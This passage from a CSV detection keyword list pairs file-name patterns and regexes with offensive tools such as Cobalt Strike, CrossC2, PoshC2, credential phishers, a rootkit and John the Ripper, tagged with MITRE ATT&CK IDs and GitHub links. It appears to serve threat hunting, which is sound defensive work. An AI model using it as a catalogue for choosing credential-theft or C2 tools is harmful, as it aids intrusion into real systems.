T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW.py*",".{0,1000}CredentialAccess_InputCapture_CredUIPromptForWindowsCredentialsW\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Credentials Found in Configurations!*",".{0,1000}Credentials\sFound\sin\sConfigurations!.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*Credentials*hekatomb_*.txt",".{0,1000}Credentials.{0,1000}hekatomb_.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" 
"*Credentials/CacheDump.*",".{0,1000}Credentials\/CacheDump\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Credentials/certsync_*",".{0,1000}Credentials\/certsync_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Credentials/LSASecrets.*",".{0,1000}Credentials\/LSASecrets\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Credentials/SAMDump*",".{0,1000}Credentials\/SAMDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*credmaster.py *",".{0,1000}credmaster\.py\s.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying 
tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*CredMaster\passwords.txt*",".{0,1000}CredMaster\\passwords\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*CredPhisher.csproj*",".{0,1000}CredPhisher\.csproj.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*CredPhisher.exe*",".{0,1000}CredPhisher\.exe.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*credphisher.py*",".{0,1000}credphisher\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*cred-popper *",".{0,1000}cred\-popper\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*CredPrompt/CredPrompt.cna*",".{0,1000}CredPrompt\/CredPrompt\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 
- T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*creds_hunt.exe*",".{0,1000}creds_hunt\.exe.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*CredsLeaker*",".{0,1000}CredsLeaker.{0,1000}","offensive_tool_keyword","CredsLeaker","This script used to display a powershell credentials box asked the user for credentials. However. That was highly noticeable. 
Now its time to utilize Windows Security popup!","T1087 - T1056 - T1003 - T1059 - T1110","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/Dviros/CredsLeaker","1","1","N/A","N/A","4","303","71","2021-03-31T11:49:57Z","2018-03-05T07:53:31Z" "*CredsPhish.ps1*",".{0,1000}CredsPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Credz-Plz.ps1*",".{0,1000}Credz\-Plz\.ps1.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*Credz-Plz-Execute.txt*",".{0,1000}Credz\-Plz\-Execute\.txt.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*cribdragg3r/Alaris*",".{0,1000}cribdragg3r\/Alaris.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 
- T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*crimeware*/zeus.profile*",".{0,1000}crimeware.{0,1000}\/zeus\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*crisis_monitor start*",".{0,1000}crisis_monitor\sstart.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*crisis_monitor stop*",".{0,1000}crisis_monitor\sstop.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - 
T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*crisprss/PrintSpoofer*",".{0,1000}crisprss\/PrintSpoofer.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","84","10","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*crk_get_key1*",".{0,1000}crk_get_key1.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" 
"*crk_get_key2*",".{0,1000}crk_get_key2.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*crk_max_keys_per_crypt*",".{0,1000}crk_max_keys_per_crypt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*crk_methods.*",".{0,1000}crk_methods\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*crk_password_loop*",".{0,1000}crk_password_loop.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*cron_priv_esc(payload*",".{0,1000}cron_priv_esc\(payload.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*Cronos Rootkit.*",".{0,1000}Cronos\sRootkit\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*CronosDebugger.*",".{0,1000}CronosDebugger\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*CronosRootkit.*",".{0,1000}CronosRootkit\..{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*CrontabPersistence.json*",".{0,1000}CrontabPersistence\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*crop.exe \\*\*.lnk \\*\harvest \\*\harvest*",".{0,1000}crop\.exe\s\\\\.{0,1000}\\.{0,1000}\.lnk\s\\\\.{0,1000}\\harvest\s\\\\.{0,1000}\\harvest.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*cross_s4u.c*",".{0,1000}cross_s4u\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*cross_s4u.x64.o*",".{0,1000}cross_s4u\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*CrossC2 beacon*",".{0,1000}CrossC2\sbeacon.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*crossc2 dyn load*",".{0,1000}crossc2\sdyn\sload.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2 framework*",".{0,1000}CrossC2\sframework.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.cna*",".{0,1000}CrossC2\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.cna*",".{0,1000}CrossC2\.cna.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.git*",".{0,1000}CrossC2\.git.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.Linux*",".{0,1000}CrossC2\.Linux.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.MacOS*",".{0,1000}CrossC2\.MacOS.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.Win*",".{0,1000}CrossC2\.Win.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2_dev_*",".{0,1000}CrossC2_dev_.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's 
